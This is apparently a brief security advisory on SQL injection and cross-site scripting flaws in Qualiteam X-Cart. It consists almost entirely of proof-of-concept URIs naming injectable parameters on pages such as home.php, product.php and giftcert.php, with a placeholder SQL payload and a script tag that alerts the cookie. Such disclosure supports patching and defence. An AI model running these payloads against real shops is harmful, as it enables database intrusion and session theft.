|
Qualiteam X-Cart SQL Injection and Cross-Site Scripting Vulnerabilities
An exploit is not required. The following proof of concept URIs are available: SQL Injection: http://www.example.com/home.php?cat='[SQL-inj] http://www.example.com/home.php?printable='[SQL-inj] http://www.example.com/product.php?productid='[SQL-inj] http://www.example.com/product.php?mode='[SQL-inj] http://www.example.com/error_message.php?access_denied&id='[SQL-inj] http://www.example.com/help.php?section='[SQL-inj] http://www.example.com/orders.php?mode='[SQL-inj] http://www.example.com/register.php?mode='[SQL-inj] http://www.example.com/search.php?mode='[SQL-inj] http://www.example.com/giftcert.php?gcid='[SQL-inj] http://www.example.com/giftcert.php?gcindex='[SQL-inj] Cross-site Scripting: http://www.example.com/home.php?cat='><script>alert(document.cookie)</script> http://www.example.com/home.php?printable='><script>alert(document.cookie)</script> http://www.example.com/product.php?productid='><script>alert(document.cookie)</script> http://www.example.com/product.php?mode='><script>alert(document.cookie)</script> http://www.example.com/error_message.php?access_denied&id='><script>alert(document.cookie)</script> http://www.example.com/help.php?section='><script>alert(document.cookie)</script> http://www.example.com/orders.php?mode='><script>alert(document.cookie)</script> http://www.example.com/register.php?mode='><script>alert(document.cookie)</script> http://www.example.com/search.php?mode='><script>alert(document.cookie)</script> http://www.example.com/giftcert.php?gcid='><script>alert(document.cookie)</script> http://www.example.com/giftcert.php?gcindex='><script>alert(document.cookie)</script> |
|
|
Privacy Statement |
